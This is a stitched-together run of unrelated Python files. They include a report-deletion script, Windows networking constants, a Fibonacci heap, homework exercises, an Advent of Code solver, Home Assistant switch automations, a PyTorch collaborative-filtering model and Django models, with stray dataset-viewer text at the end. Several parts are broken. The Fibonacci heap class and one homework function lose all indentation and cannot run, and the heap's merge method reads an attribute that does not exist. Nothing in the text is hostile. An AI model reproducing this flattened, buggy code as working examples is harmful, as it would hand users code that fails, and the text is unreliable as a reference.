                shutil.rmtree(json_dir_path)
            except:
                # Best-effort cleanup: missing files/directories are ignored.
                pass
        # Re-generate reporting data
        self.__generateLog()
def getOptsAndArgs(args):
    """
    Parse the command-line options for the delete-report script.

    param args: argument list to parse (e.g. sys.argv[1:]).
    Returns (options, leftover_args).

    BUG FIX: parse_args() was previously called with no argument, so it
    silently read sys.argv and ignored the `args` parameter entirely.
    """
    parser = OptionParser()
    parser.add_option('-P', '--product',
                      action='store', dest='productName',
                      help='Product name.'
                      )
    parser.add_option('-g', '--globalpath',
                      action='store', dest='globalPath',
                      help='Global path.'
                      )
    parser.add_option('-H', '--hostip',
                      action='store', dest='testBedHostIP',
                      help='Testbed host IP.'
                      )
    parser.add_option('-L', '--reportnames',
                      action='store', dest='reportNames',
                      help='Array of report names'
                      )
    options, args = parser.parse_args(args)
    return options, args
#__main__
if __name__ == '__main__':
    """
    Usage: python deleteReport.py -P HLS -g <absolute path to the root directory> -H <ip address of the automation server>
    """
    options, args = getOptsAndArgs(sys.argv[1:])
    # -L arrives as a Python-literal list string, e.g. "['a.html','b.html']".
    options.reportNames = ast.literal_eval(options.reportNames)
    message = deleteReport(productName=options.productName,
                           globalPath=options.globalPath,
                           testBedHostIP=options.testBedHostIP)
    message.delete(options.reportNames)
# Copyright (C) 2020 FireEye, Inc. All Rights Reserved.
# Windows networking enumeration constants; names and values match the
# RESOURCE_* / RESOURCETYPE_* / RESOURCEUSAGE_* defines in winnetwk.h
# -- presumably consumed by WNetOpenEnum-style emulation (confirm at call
# sites).
RESOURCE_CONNECTED = 1
RESOURCE_GLOBALNET = 2
RESOURCE_REMEMBERED = 3
RESOURCE_CONTEXT = 5
RESOURCETYPE_ANY = 0
RESOURCETYPE_DISK = 1
RESOURCETYPE_PRINT = 2
RESOURCEUSAGE_CONNECTABLE = 1
RESOURCEUSAGE_CONTAINER = 2
RESOURCEUSAGE_ATTACHED = 0x10
RESOURCEUSAGE_ALL = 0x13
# Win32 error code returned when no network is present.
ERROR_NO_NETWORK = 0x4C6
def get_define_int(define, prefix=''):
    """Reverse-map an integer value to the name of the module-level define
    that carries it.

    Returns the first matching name (optionally restricted to names
    starting with `prefix`), or None when nothing matches.
    """
    for name, value in globals().items():
        if not isinstance(value, int) or value != define:
            continue
        if not prefix or name.startswith(prefix):
            return name
|
from math import log
class FiboNode:
    """Node of a Fibonacci heap: payload `val` plus circular doubly-linked
    sibling pointers (left/right), a parent/child link, the child-count
    `degree`, and the cascading-cut `mark` flag."""
    def __init__(self, parent=None, child=None, left=None, right=None,
                 val=None, degree=0, mark=False):
        self.val = val
        self.parent = parent
        self.child = child
        self.left = left
        self.right = right
        self.degree = degree
        self.mark = mark
class FiboHeap:
def __init__(self):
self._min = None
self._num = 0
self._trees = 0
def _link(self, _child, _parent):
_child.left.right = _child.right
_child.right.left = _child.left
if _parent.child:
last_child = _parent.child.left
last_child.right = _child
_child.left = last_child
_child.right = _parent.child
_parent.child.left = _child
_parent.child = _child
else:
_child.right = _child.left = _child
_parent.child = _child
_parent.degree += 1
_parent.mark = False
_child.parent = _parent
def _consolidate(self):
helper = [None for i in range(0, int(log(self._num, 2)) + 1)]
root = self._min
for i in range(1, self._trees + 1):
deg = root.degree
while deg < len(helper) and helper[deg] is not None:
pointer = helper[deg]
if root.val > pointer.val:
root, pointer = pointer, root
self._link(pointer, root)
helper[deg] = None
deg += 1
helper[deg] = root
root = root.right
self._min = None
for item in helper:
if item:
if not self._min:
self._min = item
self._min.left = self._min.right = self._min
self._trees = 1
else:
tail = self._min.left
tail.right = item
item.left = tail
item.right = self._min
self._min.left = item
self._trees += 1
if self._min.val > item.val:
self._min = item
def _cut(self, x, y):
x.left.right = x.right
x.right.left = x.left
if x == y.child:
y.child = x.right
y.degree -= 1
self._min.left.right = x
x.left = self._min.left
x.right = self._min
self._min.left = x
self._trees += 1
x.parent = None
x.mark = False
def _cascading_cut(self, y):
parent = y.parent
if parent:
if not y.mark:
y.mark = True
else:
self._cut(y, parent)
self._cascading_cut(parent)
def insert(self, val):
new_node = FiboNode(val=val)
if self._min:
self._min.left.right = new_node
new_node.left = self._min.left
self._min.left = new_node
new_node.right = self._min
if val < self._min.val:
self._min = new_node
else:
self._min = new_node
new_node.mark = True
new_node.left = new_node
new_node.right = new_node
self._num += 1
self._trees += 1
def minimun(self):
return self._min.val
def minimal_node(self) -> FiboNode:
return self._min
def pop_min(self):
min_node = self._min
if not min_node:
return
if self._num == 1:
self._min = None
return min_node.val
child = min_node.child
if child:
for i in range(1, min_node.degree + 1):
child.parent = None
child = child.right
child1 = min_node.child
child_last = min_node.child.left
tail = min_node.left
child1.left = tail
tail.right = child1
min_node.right.left = child_last
child_last.right = min_node.right
self._num -= 1
self._trees = self._trees - 1 + min_node.degree
self._min = self._min.right
self._consolidate()
return min_node.val
@staticmethod
def unite_heap(heap_l, heap_r):
if not heap_l._min:
del heap_l
return heap_r
if not heap_r._min:
del heap_r
return heap_l
tail_l = heap_l._min.left
tail_r = heap_r._min.left
tail_r.right = heap_l._min
heap_l._min.left = tail_r
tail_l.right = heap_r._min
heap_r._min.left = tail_l
res = FiboHeap()
res._min = heap_l._min if heap_l._min.data < heap_r._min.val else heap_r._min
res._num = heap_l._num + heap_r._num
res._trees = heap_l._trees + heap_r._trees
del heap_r
del heap_l
return res
def __str__(self):
    """Render the heap as "<size>: <degree> <degree> ...".

    Walks the root list starting right of the minimum, stopping at the
    first node whose mark is True.  NOTE(review): this relies on the
    first-inserted root being created with mark=True as a loop
    sentinel (see insert) -- fragile once marks are mutated by cuts.
    """
    mini = self._min.right
    res = str(self._num) + ":"
    while not mini.mark:
        res += " " + str(mini.degree)
        mini = mini.right
    return res
|
## Santosh Khadka - 03-Methods and Functions/08-Functions and Methods Homework.ipynb
import re
import string
def vol(rad):
    """Return the volume of a sphere with radius ``rad``.

    Volume = (4/3) * pi * radius**3, with pi approximated as 3.14 to
    match the original exercise.
    """
    pi = 3.14
    return (4 / 3) * pi * rad ** 3
def ran_check(num, low, high):
    """Print a message if num lies in [low, high] (inclusive); returns None."""
    if low <= num <= high:
        print(num, 'is in the range between', low, 'and', high)
def ran_bool(num, low, high):
    """Return True if num lies in the inclusive range [low, high]."""
    return low <= num <= high
def up_low(s):
    """Print the number of upper-case and lower-case letters in s.

    Non-alphabetic characters are stripped before counting; output is
    printed, nothing is returned.
    """
    letters = re.sub('[^a-zA-Z]', '', s)
    uppers = sum(1 for ch in letters if ch != ch.lower())
    lowers = len(letters) - uppers
    print('Original String :', s)
    print('No. of Upper case characters :', uppers)
    print('No. of Lower case Characters :', lowers)
def unique_list(lst):
    """Return a new list with the unique elements of lst, preserving
    first-seen order.

    Bug fix: the original executed ``u_list += u_set`` inside the loop,
    appending the entire accumulated set on every iteration and
    producing duplicates (e.g. [1, 1, 2] -> [1, 1, 1, 2]).
    """
    seen = set()
    unique = []
    for item in lst:
        if item not in seen:
            seen.add(item)
            unique.append(item)
    return unique
def multiply(numbers):
    """Return the product of all numbers in the list.

    Returns 1 (the multiplicative identity) for an empty list; the
    original raised IndexError on [] because it seeded the product
    with ``numbers[0]``.
    """
    total = 1
    for n in numbers:
        total = total * n
    return total
def palindrome(s):
    """Return True if s reads the same forwards and backwards.

    Spaces are ignored; comparison is case-sensitive.
    """
    stripped = s.replace(' ', '')
    return stripped == stripped[::-1]
def isPangram(str1, alphabet=string.ascii_lowercase):
    """Return True if str1 contains every letter of alphabet at least once.

    A pangram is a sentence containing every letter of the alphabet,
    e.g. "The quick brown fox jumps over the lazy dog".

    Bug fix: the original did a case-sensitive substring test, so an
    upper-case pangram was wrongly reported as False.  Both sides are
    now lower-cased before the set comparison.
    """
    return set(alphabet.lower()) <= set(str1.lower())
def func_check(func_name):
if "vol" in str(func_name):
print('{0:.6g}'.format(vol(2))) # formatted output
if "ran_check" in str(func_name):
ran_check(5, 2, 7)
if "ran_bool" in str(func_name):
print(ran_bool(3, 1, 10))
if "up_low" in str(func_name):
up_low("Hello Mr. Rogers, how are you this fine Tuesday?")
if "unique_list" in str(func_name):
print(unique_list([1,1,1,1,2,2,3,3,3,3,4,5]))
if "multiply" in str(func_name):
print(multiply([1,2,3,-4]))
if "palindrome" in str(func_name):
print(palindrome("helleh"))
print(palindrome("tenet tenet"))
print(palindrome("asdasd"))
if "isPangram" in str(func_name):
#alphabet = 'abcdefghijklmnopqrstuvwxyz'
#print(isPangram("The quick brown fox jumps over the lazy dog", alphabet))
print(isPangram("The quick brown fox jumps over the lazy dog"))
print(isPangram("This should return False"))
def main():
    """Entry point: run the isPangram homework demo."""
    func_check(isPangram)


if __name__ == "__main__":
    main()
import sys
def stripped_lines(filename):
    """Yield each line of *filename* with surrounding whitespace stripped.

    Improvement: iterates the file object lazily instead of
    materializing the whole file with readlines() -- same output,
    constant memory.
    """
    with open(filename) as f:
        for line in f:
            yield line.strip()
def parse_ranges(range1, range2):
    """Build a predicate testing membership in either inclusive range.

    Each range is a string like "1-3"; the returned callable reports
    whether x falls inside range1 or range2 (bounds inclusive).
    """
    def bounds(r):
        lo, hi = r.split('-')
        return int(lo), int(hi)

    lo1, hi1 = bounds(range1)
    lo2, hi2 = bounds(range2)

    def check(x):
        return lo1 <= x <= hi1 or lo2 <= x <= hi2

    return check
def parse_ticket(line):
    """Parse a comma-separated ticket line into a list of ints."""
    return list(map(int, line.split(',')))
def parse_file(filename):
    """Parse the AoC day-16 ticket input file.

    Returns (rules, your_ticket, nearby_tickets):
      rules          -- dict of field name -> validity predicate
      your_ticket    -- list of ints (None if the section is missing)
      nearby_tickets -- list of lists of ints

    Sections (rules, "your ticket:", "nearby tickets:") are separated
    by blank lines; the two header lines are skipped.
    """
    state = 0
    rules = {}
    your_ticket = None  # fix: avoid UnboundLocalError on malformed input
    nearby_tickets = []
    for line in stripped_lines(filename):
        if line == '':
            state += 1  # blank line advances to the next section
            continue
        if line == 'your ticket:' or line == 'nearby tickets:':
            continue
        if state == 0:
            # Rule line, e.g. "row: 6-11 or 33-44".
            key_end = line.index(':')
            key = line[0:key_end]
            range1_end = line.index(' or ')
            range1 = line[key_end + 2: range1_end]
            range2 = line[range1_end + 4:]
            check_range = parse_ranges(range1, range2)
            rules[key] = check_range
        elif state == 1:
            your_ticket = parse_ticket(line)
        else:
            nearby_tickets.append(parse_ticket(line))
    return rules, your_ticket, nearby_tickets
def validate(rules, value):
    """Return True if value satisfies at least one rule predicate."""
    for rule in rules.values():
        if rule(value):
            return True
    return False
def p1(rules, nearby_tickets):
    """Part one: sum values valid under no rule; keep fully-valid tickets.

    Returns (invalid_sum, valid_tickets) where valid_tickets contains
    only tickets whose every value satisfies some rule.
    """
    invalid_sum = 0
    valid_tickets = []
    for ticket in nearby_tickets:
        bad_values = [v for v in ticket if not validate(rules, v)]
        invalid_sum += sum(bad_values)
        if not bad_values:
            valid_tickets.append(ticket)
    return invalid_sum, valid_tickets
def possible_columns(key, rule, tickets, ncol):
    """Return column indices where every ticket's value satisfies rule.

    ``key`` is unused; it is kept to preserve the caller's signature.
    """
    return [column for column in range(ncol)
            if all(rule(ticket[column]) for ticket in tickets)]
def get_column_map(rules, valid_tickets):
    """Assign each rule a unique ticket-column index.

    Greedy strategy: rules with the fewest candidate columns are
    assigned first, each taking its first still-free candidate.
    Asserts every rule received a column (i.e. the greedy pass
    succeeded).
    """
    ncol = len(valid_tickets[0])
    # Candidate columns for each rule.
    candidates = [(possible_columns(key, rule, valid_tickets, ncol), key)
                  for key, rule in rules.items()]
    # Most-constrained rules first, so they get first pick.
    candidates.sort(key=lambda pair: len(pair[0]))
    column_map = {}
    taken = set()
    for columns, key in candidates:
        for column in columns:
            if column not in taken:
                column_map[key] = column
                taken.add(column)
                break
    assert len(column_map) == ncol
    return column_map
def p2(rules, your_ticket, valid_tickets):
    """Part two: product of your ticket's values for 'departure *' fields."""
    column_map = get_column_map(rules, valid_tickets)
    result = 1
    for key, col in column_map.items():
        # startswith is the idiomatic (and clearer) form of find(...) == 0.
        if key.startswith('departure'):
            result *= your_ticket[col]
    return result
def main(args):
    """CLI entry point: args[1] is the path to the puzzle input."""
    rules, your_ticket, nearby_tickets = parse_file(args[1])
    p1_ans, valid_tickets = p1(rules, nearby_tickets)
    print(f'part one: {p1_ans}')
    p2_ans = p2(rules, your_ticket, valid_tickets)
    print(f'part two: {p2_ans}')
    # Expected answers for the committed input:
    # part one: 25788
    # part two: 3902565915559


if __name__ == '__main__':
    main(sys.argv)
|
"""Define automations for switches."""
# pylint: disable=attribute-defined-outside-init,unused-argument
from typing import Union
from automation import Automation, Feature # type: ignore
from const import ( # type: ignore
BLACKOUT_END, BLACKOUT_START, THRESHOLD_CLOUDY)
from util.scheduler import run_on_days # type: ignore
class SwitchAutomation(Automation):
    """Define an automation for switches."""

    class BaseFeature(Feature):
        """Define a base feature for all switches."""

        @property
        def state(self) -> bool:
            """Return the current state of the switch."""
            return self.hass.get_state(self.entities['switch'])

        def initialize(self) -> None:
            """Initialize."""
            raise NotImplementedError

        def toggle(self, state: str) -> None:
            """Toggle the switch state (no-op if already in that state)."""
            if self.state == 'off' and state == 'on':
                self.hass.log('Turning on: {0}'.format(self.entities['switch']))
                self.hass.turn_on(self.entities['switch'])
            elif self.state == 'on' and state == 'off':
                self.hass.log('Turning off: {0}'.format(self.entities['switch']))
                self.hass.turn_off(self.entities['switch'])

        def toggle_on_schedule(self, kwargs: dict) -> None:
            """Toggle the switch to kwargs['state'] at a scheduled time."""
            self.toggle(kwargs['state'])

    class PresenceFailsafe(BaseFeature):
        """Define a feature to restrict activation when we're not home."""

        def initialize(self) -> None:
            """Initialize."""
            self.hass.listen_state(
                self.switch_activated,
                self.entities['switch'],
                new='on',
                constrain_noone='just_arrived,home',
                constrain_input_boolean=self.enabled_toggle)

        def switch_activated(  # pylint: disable=too-many-arguments
                self, entity: Union[str, dict], attribute: str, old: str,
                new: str, kwargs: dict) -> None:
            """Turn the switch off if no one is home."""
            self.hass.log('No one home; not allowing switch to activate')
            self.toggle('off')

    class SleepTimer(BaseFeature):
        """Define a feature to turn a switch off after an amount of time."""

        def initialize(self) -> None:
            """Initialize."""
            self._handle = None
            self.hass.listen_state(
                self.timer_changed,
                self.entities['timer_slider'],
                constrain_input_boolean=self.enabled_toggle)
            self.hass.listen_state(
                self.switch_turned_off,
                self.entities['switch'],
                new='off',
                constrain_input_boolean=self.enabled_toggle)

        def switch_turned_off(  # pylint: disable=too-many-arguments
                self, entity: Union[str, dict], attribute: str, old: str,
                new: str, kwargs: dict) -> None:
            """Reset the sleep timer when the switch turns off."""
            self.hass.call_service(
                'input_number/set_value',
                entity_id=self.entities['timer_slider'],
                value=0)

        def timer_changed(  # pylint: disable=too-many-arguments
                self, entity: Union[str, dict], attribute: str, old: str,
                new: str, kwargs: dict) -> None:
            """Start/stop a sleep timer for this switch."""
            minutes = int(float(new))
            if minutes == 0:
                self.hass.log('Deactivating sleep timer')
                self.toggle('off')
                self.hass.cancel_timer(self._handle)
            else:
                self.hass.log(
                    'Activating sleep timer: {0} minutes'.format(minutes))
                self.toggle('on')
                self._handle = self.hass.run_in(self.timer_completed, minutes * 60)

        def timer_completed(self, kwargs: dict) -> None:
            """Turn off a switch at the end of sleep timer."""
            self.hass.log('Sleep timer over; turning switch off')
            # Zeroing the slider triggers switch_turned_off/timer_changed.
            self.hass.call_service(
                'input_number/set_value',
                entity_id=self.entities['timer_slider'],
                value=0)

    class ToggleAtTime(BaseFeature):
        """Define a feature to toggle a switch at a certain time."""

        @property
        def repeatable(self) -> bool:
            """Define whether a feature can be implemented multiple times."""
            return True

        def initialize(self) -> None:
            """Initialize."""
            if self.properties['schedule_time'] in ['sunrise', 'sunset']:
                # Dispatch to hass.run_at_sunrise / hass.run_at_sunset.
                method = getattr(
                    self.hass, 'run_at_{0}'.format(
                        self.properties['schedule_time']))
                method(
                    self.toggle_on_schedule,
                    state=self.properties['state'],
                    offset=self.properties.get('seasonal_offset', False),
                    constrain_input_boolean=self.enabled_toggle,
                    constrain_anyone='just_arrived,home'
                    if self.properties.get('presence_required') else None)
            else:
                if self.properties.get('run_on_days'):
                    run_on_days(
                        self.hass,
                        self.toggle_on_schedule,
                        self.properties['run_on_days'],
                        self.hass.parse_time(self.properties['schedule_time']),
                        state=self.properties['state'],
                        constrain_input_boolean=self.enabled_toggle)
                else:
                    self.hass.run_daily(
                        self.toggle_on_schedule,
                        self.hass.parse_time(self.properties['schedule_time']),
                        state=self.properties['state'],
                        constrain_input_boolean=self.enabled_toggle)

    class ToggleIfToggled(BaseFeature):
        """Define a feature to immediately toggle a switch back."""

        def initialize(self) -> None:
            """Initialize."""
            self.hass.listen_state(
                self.switch_toggled,
                self.entities['switch'],
                constrain_input_boolean=self.enabled_toggle)

        def delay_complete(self, kwargs: dict) -> None:
            """Toggle the switch back after a delay."""
            self.toggle(self.properties['desired_state'])

        def switch_toggled(  # pylint: disable=too-many-arguments
                self, entity: Union[str, dict], attribute: str, old: str,
                new: str, kwargs: dict) -> None:
            """Toggle the switch back."""
            if new != self.properties['desired_state']:
                if self.properties.get('delay'):
                    self.handles[self.hass.friendly_name] = self.hass.run_in(
                        self.delay_complete, self.properties['delay'])
                else:
                    self.toggle(self.properties['desired_state'])
            else:
                # Back in the desired state: cancel any pending delayed toggle.
                if self.hass.friendly_name in self.handles:
                    handle = self.handles.pop(self.hass.friendly_name)
                    self.hass.cancel_timer(handle)

    class TurnOnUponArrival(BaseFeature):
        """Define a feature to turn a switch on when one of us arrives."""

        def initialize(self) -> None:
            """Initialize."""
            if self.properties.get('possible_conditions'):
                for name, value in self.properties['possible_conditions'].items():
                    self.listen_for_arrival({name: value})
            else:
                self.listen_for_arrival()

        def listen_for_arrival(self, constraint_kwargs: dict = None) -> None:
            """Create an event listen for someone arriving."""
            if not constraint_kwargs:
                constraint_kwargs = {}
            if self.properties.get('trigger_on_first_only'):
                constraint_kwargs['first'] = True
            self.hass.listen_event(
                self.someone_arrived,
                'PRESENCE_CHANGE',
                new=self.hass.presence_manager.HomeStates.just_arrived.value,
                constrain_input_boolean=self.enabled_toggle,
                **constraint_kwargs)

        def someone_arrived(
                self, event_name: str, data: dict, kwargs: dict) -> None:
            """Turn on after dark when someone comes homes."""
            self.hass.log('Someone came home after dark; turning on the switch')
            self.toggle('on')

    class TurnOnWhenCloudy(BaseFeature):
        """Define a feature to turn a switch on at certain cloud coverage."""

        def initialize(self) -> None:
            """Initialize."""
            self.cloudy = False
            self.hass.listen_state(
                self.cloud_coverage_reached,
                self.entities['cloud_cover'],
                constrain_start_time=BLACKOUT_END,
                constrain_end_time=BLACKOUT_START,
                constrain_input_boolean=self.enabled_toggle,
                constrain_anyone='just_arrived,home'
                if self.properties.get('presence_required') else None)

        def cloud_coverage_reached(  # pylint: disable=too-many-arguments
                self, entity: Union[str, dict], attribute: str, old: str,
                new: str, kwargs: dict) -> None:
            """Turn on the switch when a "cloudy event" occurs."""
            try:
                cloud_cover = float(new)
            except ValueError:
                cloud_cover = 0.0
            if (not self.cloudy and cloud_cover >= THRESHOLD_CLOUDY):
                self.hass.log('Cloud cover above {0}%'.format(cloud_cover))
                self.toggle('on')
                self.cloudy = True
            elif (self.cloudy and cloud_cover < THRESHOLD_CLOUDY):
                self.hass.log('Cloud cover below {0}%'.format(cloud_cover))
                self.toggle('off')
                self.cloudy = False

    class VacationMode(BaseFeature):
        """Define a feature to simulate craziness when we're out of town."""

        def initialize(self) -> None:
            """Initialize."""
            self._off_handle = None
            self._on_handle = None
            self.hass.listen_event(
                self.vacation_mode_toggled, 'MODE_CHANGE', mode='vacation_mode')

        def vacation_mode_toggled(
                self, event_name: str, data: dict, kwargs: dict) -> None:
            """Respond to changes when vacation mode gets toggled."""
            if data['state'] == 'on':
                # Bug fix: these were stored on misspelled attributes
                # (_on_handler/_off_handler), so the cancel_timer calls
                # below always received the initial None handles and the
                # scheduled sunset timers were never cancelled.
                self._on_handle = self.hass.run_at_sunset(
                    self.toggle_on_schedule,
                    state='on',
                    random_start=-60 * 60 * 1,
                    random_end=60 * 30 * 1)
                self._off_handle = self.hass.run_at_sunset(
                    self.toggle_on_schedule,
                    state='off',
                    random_start=60 * 60 * 2,
                    random_end=60 * 60 * 4)
            else:
                self.hass.cancel_timer(self._off_handle)
                self.hass.cancel_timer(self._on_handle)
|
from django.apps import AppConfig
class KawswebenterConfig(AppConfig):
    """Django application configuration for the KawsWebEnter app."""
    # Label/dotted path Django uses to register this application.
    name = 'KawsWebEnter'
|
#
# Copyright © 2021 Uncharted Software Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import numpy as np
import torch
from torch import nn
from torch.nn import functional as F
from torch.utils.data import DataLoader, TensorDataset
from basenet import BaseNet, HPSchedule
from basenet.helpers import to_numpy
from .base import DistilBaseModel
from .metrics import metrics, classification_metrics, regression_metrics
# --
# Models
class CFModel(BaseNet):
    """Neural collaborative-filtering model.

    Embeds users and items, passes the concatenated embeddings through
    one hidden ReLU layer, and adds learned per-user and per-item
    scalar biases to the score.
    """

    def __init__(self, loss_fn, n_users, n_items, emb_dim=1024, n_outputs=1):
        super().__init__(loss_fn=loss_fn)

        # Embedding tables.  Creation and init order is kept identical to
        # the original so RNG consumption (and thus seeded runs) match.
        self.emb_users = nn.Embedding(n_users, emb_dim)
        self.emb_items = nn.Embedding(n_items, emb_dim)
        self.emb_users.weight.data.uniform_(-0.05, 0.05)
        self.emb_items.weight.data.uniform_(-0.05, 0.05)

        # One scalar bias per user / item.
        self.user_bias = nn.Embedding(n_users, 1)
        self.item_bias = nn.Embedding(n_items, 1)
        self.user_bias.weight.data.uniform_(-0.01, 0.01)
        self.item_bias.weight.data.uniform_(-0.01, 0.01)

        self.hidden = nn.Linear(2 * emb_dim, emb_dim)
        self.score = nn.Linear(emb_dim, n_outputs, bias=False)

    def forward(self, x):
        # x is indexed as x[:, 0] (user ids) and x[:, 1] (item ids) --
        # presumably a (batch, 2) LongTensor; confirm against callers.
        user_ids, item_ids = x[:, 0], x[:, 1]
        # ?? Dropout
        joint = torch.cat(
            [self.emb_users(user_ids), self.emb_items(item_ids)], dim=1)
        hidden_out = F.relu(self.hidden(joint))
        return (self.score(hidden_out)
                + self.user_bias(user_ids)
                + self.item_bias(item_ids))
class SGDCollaborativeFilter(DistilBaseModel):
    """Collaborative filter trained with SGD over an ensemble of CFModels.

    One CFModel is trained per embedding size in ``emb_dims``; predictions
    are the mean of the ensemble members' outputs.
    """

    def __init__(
        self,
        n_users,
        n_items,
        emb_dims=[128, 256, 512, 1024],
        n_outputs=1,
        epochs=8,
        batch_size=512,
        lr_max=2e-3,
        device="cuda",
    ):
        # NOTE(review): emb_dims has a mutable default; harmless here
        # because it is only iterated, never mutated.
        self.loss_fn = F.l1_loss  # hard coded loss
        # if target_metric == 'meanAbsoluteError':
        #     self.loss_fn = F.l1_loss
        # # elif target_metric == 'accuracy':
        # #     self.loss_fn = F.binary_cross_entropy_with_logits
        # else:
        #     raise Exception('SGDCollaborativeFilter: unknown metric')
        self.n_users = n_users
        self.n_items = n_items
        self.emb_dims = emb_dims
        self.n_outputs = n_outputs
        self.epochs = epochs
        self.batch_size = batch_size
        self.device = device
        self.lr_max = lr_max

    def _make_model(self, emb_dim):
        """Build one CFModel with an Adam optimizer and linear LR schedule."""
        model = CFModel(
            emb_dim=emb_dim,
            loss_fn=self.loss_fn,
            n_users=self.n_users,
            n_items=self.n_items,
            n_outputs=self.n_outputs,
        )
        model.init_optimizer(
            opt=torch.optim.Adam,
            params=model.parameters(),
            hp_scheduler={
                "lr": HPSchedule.linear(hp_max=self.lr_max, epochs=self.epochs)
            },
        )
        return model

    def fit(self, X_train, y_train, U_train=None):
        """Train one model per embedding size on (user, item) -> rating pairs.

        X_train -- presumably a DataFrame-like with .values giving
                   (user_id, item_id) integer pairs; confirm at call site.
        y_train -- target values, one per row of X_train.
        U_train -- accepted for interface compatibility but unused.
        """
        dataloaders = {
            "train": DataLoader(
                TensorDataset(
                    torch.LongTensor(X_train.values),
                    torch.FloatTensor(y_train).view(-1, 1),
                ),
                shuffle=True,
                batch_size=self.batch_size,
            ),
        }
        # --
        # Train
        self._models = [self._make_model(emb_dim=emb_dim) for emb_dim in self.emb_dims]
        for i, model in enumerate(self._models):
            print("model=%d" % i, file=sys.stderr)
            model = model.to(self.device)
            for epoch in range(self.epochs):
                train = model.train_epoch(dataloaders, mode="train", compute_acc=False)
                print(
                    {
                        "epoch": int(epoch),
                        "train_loss": float(np.mean(train["loss"])),
                    },
                    file=sys.stderr,
                )
            # Move back to CPU so the fitted ensemble is device-agnostic.
            model = model.to("cpu")
        # clean up to allow pickling
        for model in self._models:
            del model.opt
            del model.hp_scheduler
        return self

    def predict(self, X):
        """Return the mean prediction of the ensemble for each row of X."""
        dataloaders = {
            "test": DataLoader(
                TensorDataset(
                    torch.LongTensor(X.values),
                    # Dummy targets (-1): the basenet predict API wants them.
                    torch.FloatTensor(np.zeros(X.shape[0]) - 1).view(-1, 1),
                ),
                shuffle=False,
                batch_size=self.batch_size,
            )
        }
        # --
        # Test
        all_preds = []
        for model in self._models:
            model = model.to(self.device)
            preds, _ = model.predict(dataloaders, mode="test")
            all_preds.append(to_numpy(preds).squeeze())
            model = model.to("cpu")
        # Average the ensemble members' predictions.
        return np.vstack(all_preds).mean(axis=0)
|
# Constants for a BCA protein-assay plate workflow (names suggest a
# 96-well plate layout; semantics hedged below where not evident).

# Index of the blank well within the standards row (0-based) -- TODO confirm.
STANDARD_BLANK_INDEX = 8
# Wells per plate row; 12 matches a standard 96-well plate.
ROW_LENGTH = 12
# Standard-curve concentrations, highest to lowest; presumably ug/mL,
# per the column header below.
KNOWN_CONCENTRATIONS = [2000, 1500, 1000, 750, 500, 250, 125, 25, 0]
# Column header used for concentration values in result tables.
BCA_CONCENTRATION_COLUMN = "Conc [ug/mL]"
# Default grouping-column names for output tables.
DEFAULT_LEVEL1_COL = "Cell Type"
DEFAULT_LEVEL2_COL = "Method (KF or manual)"
# Default sample well range (inclusive), e.g. row C, columns 1-12.
DEFAULT_SAMPLE_START = "C1"
DEFAULT_SAMPLE_END = "C12"
# Default number of replicate measurements per sample.
DEFAULT_NUM_REPLICATES = 1
|
from django.db import models
from authentication.models import User
class Customer(models.Model):
    """A customer contact/address record owned by a User."""

    first_name = models.CharField(max_length=400, blank=True, default='')
    last_name = models.CharField(max_length=400, blank=True, default='')
    email = models.EmailField(blank=True)
    # Deleting the owning User cascades to their customers.
    owner = models.ForeignKey(User, on_delete=models.CASCADE)
    company = models.CharField(max_length=400, blank=True, default='')
    phone = models.CharField(max_length=400, blank=True, default='')
    apartment = models.CharField(max_length=400, blank=True, default='')
    address = models.CharField(max_length=400, blank=True, default='')
    city = models.CharField(max_length=400, blank=True, default='')
    country = models.CharField(max_length=400, blank=True, default='')
    region = models.CharField(max_length=400, blank=True, default='')
    postal_code = models.CharField(max_length=400, blank=True, default='')
    # Image reference stored as free text (a URL or path), not an ImageField.
    image = models.CharField(max_length=400, blank=True, default='')

    class Meta:
        # Explicit table name instead of the app_model default.
        db_table = 'customer'

    def __str__(self):
        """Return the customer's first name as the display string."""
        return self.first_name
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.